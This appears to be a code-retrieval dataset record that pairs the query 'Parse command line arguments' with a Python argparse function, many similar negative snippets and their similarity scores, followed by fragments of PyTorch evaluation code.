maxDepth/depth\n #No use self.criterion \n\n output = self.model(image)\n # Compute the loss\n\n l_depth = l1_criterion(output, depth_n)\n\n l_ssim = torch.clamp((1 - ssim(output, depth_n, val_range = 1000.0 / 10.0)) * 0.5, 0, 1)\n\n loss = (1.0 * l_ssim) + (0.1 * l_depth)\n\n \n\n if self.half:\n images = images.half()\n\n # forward + backward + optimize\n \n self._count_correct_prediction(output, depth_n)\n losses.append(loss.item())\n\n avg_loss = sum(losses) / len(losses)\n acc = self._get_epoch_acc(is_test=True)\n return avg_loss, acc\n\n # # testloaders contain same length(iteration) of batch dataset\n # for data in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n # images, labels = data[0].to(self.device), data[1].to(self.device)\n\n # if self.half:\n # images = images.half()\n\n # # forward + backward + optimize\n # loss, outputs = self.criterion(model, images=images, labels=labels)\n # self._count_correct_prediction(outputs, labels)\n # losses.append(loss.item())\n\n # avg_loss = sum(losses) / len(losses)\n # acc = self._get_epoch_acc(is_test=True)\n # return avg_loss, acc", "def eval_net(net, loader, device):\n net.eval()\n mask_type = torch.float32 if net.n_classes == 1 else torch.long\n n_val = len(loader) # the number of batch\n tot = 0\n\n with tqdm(total=n_val, desc='Validation round', unit='batch', leave=False) as pbar:\n for batch in loader:\n imgs, true_masks = batch['image'], batch['mask']\n imgs = imgs.to(device=device, dtype=torch.float32)\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n with torch.no_grad():\n mask_pred = net(imgs)\n\n if net.n_classes > 1:\n tot += F.cross_entropy(mask_pred, true_masks.squeeze(1)).item()\n else:\n pred = torch.sigmoid(mask_pred)\n pred = (pred > 0.5).float()\n tot += dice_coeff(pred, true_masks).item()\n pbar.update()\n\n net.train()\n return tot / n_val", "def test_model(net, data_loader):\n net.eval()\n true_preds, count = 0.0, 0\n for imgs, labels in data_loader:\n imgs, labels = imgs.to(device), labels.to(device)\n with torch.no_grad():\n preds = net(imgs).argmax(dim=-1)\n true_preds += (preds == labels).sum().item()\n count += labels.shape[0]\n test_acc = true_preds / count\n return test_acc", "def eval(self, *args, **kwargs):\n raise NotImplementedError" ]
[ "0.7058148", "0.6562479", "0.6410497", "0.6410497", "0.64048153", "0.6211592", "0.61744463", "0.6138237", "0.60468954", "0.5828812", "0.5767713", "0.57668567", "0.57438034", "0.57431364", "0.57200557", "0.5707766", "0.5693356", "0.56603515", "0.56447244", "0.5637777", "0.5625589", "0.5547203", "0.5526483", "0.55137634", "0.549431", "0.546889", "0.5460552", "0.5458127", "0.5451793", "0.5448735", "0.5448328", "0.54453087", "0.54364383", "0.54276294", "0.5421578", "0.5412491", "0.5355198", "0.5347941", "0.5343304", "0.534144", "0.53411007", "0.53256416", "0.53176266", "0.530643", "0.5294836", "0.52945286", "0.52882427", "0.52854043", "0.5281059", "0.52461004", "0.52358115", "0.52356344", "0.52325636", "0.5225295", "0.52174795", "0.52155054", "0.5211494", "0.5211375", "0.52052885", "0.52005357", "0.5182883", "0.5176481", "0.5173727", "0.5173297", "0.516498", "0.51589084", "0.5151062", "0.51437837", "0.51364905", "0.51348716", "0.5128271", "0.5126886", "0.5124652", "0.51224613", "0.5114541", "0.5102453", "0.5099635", "0.50957644", "0.50909233", "0.5088713", "0.5085543", "0.50852567", "0.5083463", "0.506926", "0.50657624", "0.50654393", "0.5057001", "0.50565845", "0.5051687", "0.5046366", "0.50408566", "0.50355613", "0.5035323", "0.5031733", "0.5026579", "0.5019157", "0.5015733", "0.50137246", "0.50129265", "0.50113785", "0.5002266" ]
0.0
-1
Parse command line arguments.
def parse_args(): parser = argparse.ArgumentParser(description="Hyper parameter") parser.add_argument( "--model", help="Model to use", default="All", type=str) return parser.parse_args()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_arguments(args):", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def parseArguments(self):\n iterator = iter(sys.argv[1:]) # Skip file name\n for argument in iterator:\n if len(argument) < 2 or argument[:2] != '--':\n self.error('syntax error \"{}\"'.format(argument))\n else:\n def getValueOfArgument(): return next(iterator)\n self.parseArgument(argument[2:], getValueOfArgument)", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def parse_command_line_arguments():\n\n description, epilog = __doc__.split(\"\\n\\n\", 1)\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description,\n epilog=epilog)\n\n parser.add_argument('-s', '--s', dest='s', action='store', type=float, required=True,\n help='Minimum frequency')\n parser.add_argument('-c', '--credentials', dest='credentials', action='store',\n default=\"./.tpass\",\n help='File with Twitter credentials (username and password, separated by a space)')\n\n args = parser.parse_args()\n \n return args", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--urls_dirpath', type=unicode)\n parser.add_argument('-r', '--resources_dir', type=unicode)\n parser.add_argument('-t', '--total_docs', type=int)\n parser.add_argument('-m', '--mapping', type=unicode,\n help='File with the yago to lkif mapping')\n\n return parser.parse_args()", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def _parse_command_line_arguments():\n parser = ArgumentParser(\n description=(\n 'Command-line tool to generate a list of unique from a TS file from FermiFAST'\n ),\n )\n parser.add_argument(\n 'ts-file',\n type=str,\n help=(\n 'A file containing the TS sky map'\n ),\n )\n parser.add_argument('--skiprows',\n type=int,\n help='number of rows to skip at the top (default 0)',\n required=False)\n parser.set_defaults(skiprows=0)\n arguments = vars(parser.parse_args())\n return arguments", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Bandits algorithms on a click-through \"\n \"rate dataset.\")\n parser.add_argument('--plot', action='store_true')\n return parser.parse_args()", "def parse_arguments(args=sys.argv[1:]):\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-i', '--input',\n help=\"Path of input file to read. Default: {d}\".format(d=INPUT_FILE),\n default=INPUT_FILE)\n \n return parser.parse_args(args)", "def parse_args():\n parser = default_argument_parser()\n parser.add_argument(\"--label-map\",\n dest=\"label_map\",\n type=pathlib.Path,\n help=\"Label map in YAML format which maps from category \"\n \"ID to name.\")\n parser.add_argument(\"--train-csv\",\n dest=\"train_csv\",\n required=True,\n type=pathlib.Path,\n help=\"Path to training data CSV file.\")\n parser.add_argument(\"--valid-csv\",\n dest=\"valid_csv\",\n required=False,\n type=pathlib.Path,\n help=\"Optional path to validation data CSV file.\")\n parser.add_argument(\n \"--image-width\",\n type=int,\n help=\"Image width (optional, used to speed up dataset processing).\")\n parser.add_argument(\n \"--image-height\",\n type=int,\n help=\"Image height (optional, used to speed up dataset processing).\")\n return parser.parse_args()", "def _parse_args(argv):\n parser = make_parser()\n args = parser.parse_args(argv)\n LOGGER.setLevel(to_log_level(args.loglevel))\n\n if not args.inputs:\n if args.list:\n tlist = \", \".join(API.list_types())\n _exit_with_output(\"Supported config types: \" + tlist)\n elif args.env:\n cnf = os.environ.copy()\n _output_result(cnf, args.output, args.otype or \"json\", None, None)\n sys.exit(0)\n else:\n parser.print_usage()\n sys.exit(1)\n\n if args.validate and args.schema is None:\n _exit_with_output(\"--validate option requires --scheme option\", 1)\n\n return args", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n help_str = \\\n 'The collection folder to sort files into. ' \\\n 'If the folder does not exist, it will be created along with the ' \\\n 'necessary contents.'\n parser.add_argument('-c', '--collection', help=help_str)\n\n help_str = \\\n 'The source folder to import files from. Has to exist and ' \\\n 'has to be a folder.'\n parser.add_argument('-s', '--source', help=help_str, required=False)\n\n help_str = \\\n 'View the gallery in random order auto skpping after the' \\\n 'given amount of seconds'\n parser.add_argument('-v', '--view', help=help_str, required=False)\n\n return parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser()\n\n # Positional args\n parser.add_argument('data_directory', action=\"store\")\n\n # Optional args\n parser.add_argument('--save_dir', action='store',\n dest='save_dir',\n help='Load categories names from given file',\n default=\"checkpoint.pth\")\n\n parser.add_argument('--gpu', action='store_true',\n dest='device',\n help='Device of prediction processing',\n default=False)\n\n parser.add_argument('--arch', action='store',\n dest='arch',\n help='Name of pre-trained network used for training',\n default=\"vgg11\")\n\n parser.add_argument('--learning_rate', action='store',\n dest='learning_rate',\n help='value of training learning rate',\n default=0.001)\n\n parser.add_argument('--hidden_units', action='store',\n dest='hidden_units',\n help='Number of units in the fully-connected hidden '\n 'layer of the neural netwrork',\n default=512)\n\n parser.add_argument('--epochs', action='store',\n dest='epochs',\n help='Number of training epochs',\n default=5)\n\n # Parse all args\n results = parser.parse_args()\n\n return results", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"-threads\", help=\"specifies a thread count for parallel operations\", type=int)\n return parser.parse_args()", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\", \"--events\", type=str,\n help=\"path to events CSV-file\")\n parser.add_argument(\"-d\", \"--data\", type=str,\n help=\"path to data CSV-file\")\n parser.add_argument(\"-l\", \"--limit\", nargs='?', type=int, default=None,\n help=\"max records to be processed\")\n parser.add_argument(\"-t\", \"--timezone\", nargs='?', type=int, default=5,\n help=\"date and time shift\")\n parser.add_argument(\"-o\", \"--optimized\", action='store_true',\n help=\"if specified, then data CSV will be processed\"\n \" by small chunks to escape memory issues\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"--output-folder\", nargs='?', type=str,\n default=\"linked\")\n return vars(parser.parse_args())", "def parse_args(args=None):\n return AP.parse_args(args=args)", "def parse_args():\n\tparser = argparse.ArgumentParser(description='Show video statistics.')\n\tparser.add_argument('--sort', metavar='FIELD', choices=['views', 'likes', 'dislikes'],\n\t default='views',\n\t help='sort by the specified field. Options are views, likes and dislikes.')\n\tparser.add_argument('--max', metavar='MAX', type=int, help='show the top MAX entries only.')\n\tparser.add_argument('--csv', action='store_true', default=False,\n\t help='output the data in CSV format.')\n\tparser.add_argument('--table', action='store_true', default=False,\n\t help='output the data in an ascii table.')\n\tparser.add_argument('--workers', type=int, default=8,\n\t help='number of workers to use, 8 by default.')\n\treturn parser.parse_args()", "def parse_args(args=None):\n\t\treturn _get_args_parser().parse_args(args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--debug\",\n help=\"Print lots of debugging statements\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.ERROR,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.INFO,\n )\n parser.add_argument(\"runscript\", default=None)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--obs_len\",\n default=20,\n type=int,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--data_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--feature_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the computed features are saved\",\n )\n parser.add_argument(\"--mode\",\n required=True,\n type=str,\n help=\"train/val/test/compute_all/lanes_only\")\n parser.add_argument(\n \"--sequence_num\",\n default=-1,\n type=int,\n help=\"Specify a specific sequence to visualize.\",\n )\n parser.add_argument(\n \"--batch_start\",\n default=0,\n type=int,\n help=\"Specify the starting row of features to visualize.\",\n )\n parser.add_argument(\n \"--batch_end\",\n default=-1,\n type=int,\n help=\"Specify the last row to visualize, -1 to visualize till end.\",\n )\n parser.add_argument(\n \"--single_figure\",\n default=False,\n action=\"store_true\",\n help=\"Plot all candidates for a scenein one figure.\",\n )\n return parser.parse_args()", "def argumentsParser(args):\n\targuments = []\n\tif args.find('\"') > -1:\n\t\tt_arguments = args.split('\"')\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args.find(\"'\") > -1:\n\t\tt_arguments = args.split(\"'\")\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args == ' ':\n\t\tpass\n\telse:\n\t\targuments = args.split(' ')\n\treturn arguments", "def parse_args():\n parser = argparse.ArgumentParser(description='Google reminders cli',\n epilog=usage,\n formatter_class=argparse.RawTextHelpFormatter)\n return parser.parse_args()", "def parseArgs():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default='fsod', help='training dataset') # use fsod dataset for default\n parser.add_argument('--cfg', dest='cfg_file', required=True, help='optional config file')\n parser.add_argument('--load_ckpt', help='path to load checkpoint')\n parser.add_argument('--load_detectron', help='path to load detectron weight pickle file')\n parser.add_argument('--output_dir', help='output directory to save the testing results.')\n parser.add_argument('--range', help='[start, end)', type=int, nargs=2)\n parser.add_argument('--visualize', dest='visualize', help='output images of detection', action='store_true')\n return parser.parse_args()", "def parse_arguments():\n parser = ArgumentParser()\n\n # For development/testing\n parser.add_argument(\"--dev\", help=\"run the code of the developers tag\")\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # All reference encoders\n parser.add_argument(\"--step\", dest=\"step\", default=\"10\", type=int, help=\"step size\")\n parser.add_argument(\"--repeats\", dest=\"repeats\", type=int, default=1, help=\"repeats\")\n\n parser.add_argument(dest=\"image\", default=None,\n help=\"select the test image to run\")\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Subscription Watch CSV file packaging script\", prog=sys.argv[0])\n\n # required args\n parser.add_argument(\"-f\", \"--filepath\", required=True,\n help=\"path to files to package\")\n parser.add_argument(\n \"-s\",\n \"--max-size\",\n type=int,\n default=DEFAULT_MAX_SIZE,\n help=f\"Maximum size of packages in MiB. (Default: {DEFAULT_MAX_SIZE} MiB)\",\n )\n parser.add_argument(\n \"-o\", \"--overwrite\", action=\"store_true\", default=False, help=\"whether to overwrite existing files.\"\n )\n parser.add_argument(\"--ocp-cluster-id\", required=True,\n help=\"OCP Cluster ID\")\n parser.add_argument(\"-v\", \"--verbosity\", action=\"count\",\n default=0, help=\"increase verbosity (up to -vvv)\")\n return parser.parse_args()", "def parseArgs():\n parser = argparse.ArgumentParser(description='Runs RHEAS simulation.')\n parser.add_argument('config', help='configuration file')\n parser.add_argument('-d', metavar='DB', help='name of database to connect')\n parser.add_argument('-u', help='update database', action='store_true')\n args = parser.parse_args()\n return args.config, args.d, args.u", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--version',\n metavar=\"<str>\",\n help=\"Input data version number\",\n type=str,\n required=True\n )\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"\"\"A script to get the kmer frequency\n from csv files with kmer counts from genomes.\"\"\")\n\n parser.add_argument('-sd',\n '--sub_dir',\n type=str,\n dest='sub_dir',\n help='Subdirectory name for output files.') # kmer_count\n\n parser.add_argument('-do',\n '--dir_out',\n type=str,\n dest='dir_out',\n help='directory name for output files.') # Results/kmer_freq\n\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"CUDAPOA Python API sample program.\")\n parser.add_argument('-m',\n help=\"Run MSA generation. By default consensusis generated.\",\n action='store_true')\n parser.add_argument('-p',\n help=\"Print output MSA or consensus for each POA group.\",\n action='store_true')\n parser.add_argument('-l',\n help=\"Use long or short read sample data.\",\n action='store_true')\n return parser.parse_args()", "def parse_args():\n parser = OptionParser()\n parser.add_option('--data-file', '-f', default='train_data.hdf5',\n help=\"The path to the data file\")\n parser.add_option('--runs-per-epoch', '-r', type='int',\n help=\"The number of runs per epoch (train samples count)\")\n parser.add_option('--avg-window-size', '-w', default='1', type='int',\n help=\"The window size for moving average\")\n\n (options, args) = parser.parse_args()\n return options", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self._begin_logging()\n if argv is None:\n argv = sys.argv\n logger.info(' '.join(argv))\n self._process_input_files()\n self._construct_links_of_interest()\n self._open_output_files()\n data = self._construct_data_struct()\n return data", "def parseArgs(arguments=None):\n\tparser = generateParser(None)\n\treturn parser.parse_known_args(arguments)", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # Optional Argument\n parser.add_argument('-l', '--length', metavar='length', type=float, default=2, help='length (meter)')\n parser.add_argument('-k', '--conductivity', metavar='conductivity', type=float, default=0.5, help='constant thermal conductivity (W/m.K)')\n parser.add_argument('-q', '--heatgeneration', metavar='heatgeneration', type=float, default=1000, help='uniform heat generation (kW/m^3)')\n parser.add_argument('-TA', '--tempA', metavar='tempA', type=int, default=100, help='temperature at A (Celcius)')\n parser.add_argument('-TB', '--tempB', metavar='tempB', type=int, default=200, help='temperature at A (Celcius)')\n parser.add_argument('-n', '--nodes', metavar='nodes', type=int, default=5, help='nodes (positive integer)')\n parser.add_argument('-A', '--area', metavar='area', type=float, default=1, help='area (m^2)')\n parser.add_argument('-nf', '--nofigure', action='store_true', help='disable figure')\n parser.add_argument('-nd', '--nodetail', action='store_true', help='disable detail')\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"script for downloading and merging log files from S3 for particular time period\")\n parser.add_argument(\"-s\", \n \"--startdate\", \n help=\"start date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-e\", \"--enddate\", \n help=\"end date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-f\", \n \"--file\", \n help=\"destination file\", \n required=True)\n parser.add_argument( \"-c\", \"--config\",\n default=\"/Users/samarius/.get_analytics_log.config.json\",\n help=\"configuration file path\")\n\n\n try:\n args = parser.parse_args()\n return args\n except Exception as e:\n print \"can't parse command line args: {}\".format(repr(e))\n raise", "def parse_args():\n\n parser = argparse.ArgumentParser(description='Disk metric sender')\n parser.add_argument('-v', '--verbose', action='store_true', default=None, help='Verbose?')\n parser.add_argument('--debug', action='store_true', default=None, help='Debug?')\n\n return parser.parse_args()", "def parseArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_folder',\n help='Path of the folder where output files should be written.')\n parser.add_argument('--partition_id',\n help='ID of the computer partition to collect data from.')\n parser.add_argument('--collector_db',\n help='The path of slapos collect database.')\n\n return parser.parse_args()", "def arg_parse():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\",\n \"--fpath\",\n type=str,\n required=True,\n help=\"Path to files to generate test data from e.g. /badc/cmip5/data/cmip5/output1/MOHC/HadGEM2-ES/rcp85/mon/atmos/Amon/r1i1p1/latest/tas\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--time_only\",\n default=False,\n help=\"Only generate one time step of this dataset\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--step\",\n type=int,\n default=100,\n help=\"Step to select latitude/longitude by. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--number\",\n type=int,\n default=0,\n help=\"Number of files to generate. Default is all files. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--level\",\n type=int,\n default=-1,\n help=\"Number of levels to extract, starting with index 0.\",\n )\n\n parser.add_argument(\n \"-c\", \"--compress\", help=\"Compress the files.\", action=\"store_true\"\n )\n\n return parser.parse_args()", "def parse_args():\n parser = ArgumentParser(\n description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-i', '--infile', type=is_valid_file, action=FullPaths,\n metavar='FILE', required=True, help='''Settings file'''\n )\n parser.add_argument(\n '-d', '--ddc_file', type=is_valid_file, action=FullPaths,\n metavar='FILE', default='ddc2_nios2_sw.elf',\n help='''DDC2 download file'''\n )\n parser.add_argument(\n '-t', '--time', type=int, metavar='INT', default=5,\n help='''Number of seconds to run DDC2'''\n )\n parser.add_argument(\n '-o', '--outfile', type=str, default='./data/test/test',\n metavar='FILE', required=False,\n help='''Output location of data (no need to include file extension)'''\n )\n parser.add_argument(\n '--live', action='store_true', default=False,\n help='''Live visualisation'''\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='''Verbose'''\n )\n args = parser.parse_args()\n return args", "def parse_args():\n parser = ArgumentParser(\n description=\"This is a script for auto apply ipex optimization.\"\n \"\\n################################# Basic usage ############################# \\n\"\n \"\\n 1. Apply ipex optimization with fp32 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex python_script args \\n\"\n \"\\n 2. Apply ipex optimization with bf16 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex --dtype bfloat16 python_script args \\n\",\n formatter_class=RawTextHelpFormatter,\n )\n\n add_auto_ipex_params(parser, auto_ipex_default_enabled=True)\n\n # positional\n parser.add_argument(\n \"program\",\n type=str,\n help=\"The full path to the proram/script to be launched. \"\n \"followed by all the arguments for the script\",\n )\n # rest from the training program\n parser.add_argument(\"program_args\", nargs=REMAINDER)\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parse_arguments():\n # shift away script name\n scriptname=sys.argv[0]\n shift()\n ncl_cmd=list()\n quali_cmd=list()\n id_cmd=list() \n while(len(sys.argv)>0):\n carg = sys.argv[0]\n shift()\n if(carg == \"--nucleotide\"):\n ncl_cmd = mungeArgs(sys.argv)\n elif(carg == \"--quality\"):\n quali_cmd = mungeArgs(sys.argv)\n elif(carg == \"--id\" ):\n id_cmd = mungeArgs(sys.argv)\n elif(carg in [\"-h\", \"--help\"]):\n usage()\n else:\n usage(error=True)\n # Excess arguments which are not processed \n if(len(sys.argv) > 0):\n sys.stdout.write(\"Excess arguments!\\n\")\n sys.stdout.flush()\n usage(error=True)\n\n # external modules rely on non-empty argv array, \n # re-append the script name as first command line argument\n sys.argv.append(scriptname)\n return (id_cmd, ncl_cmd, quali_cmd)", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n 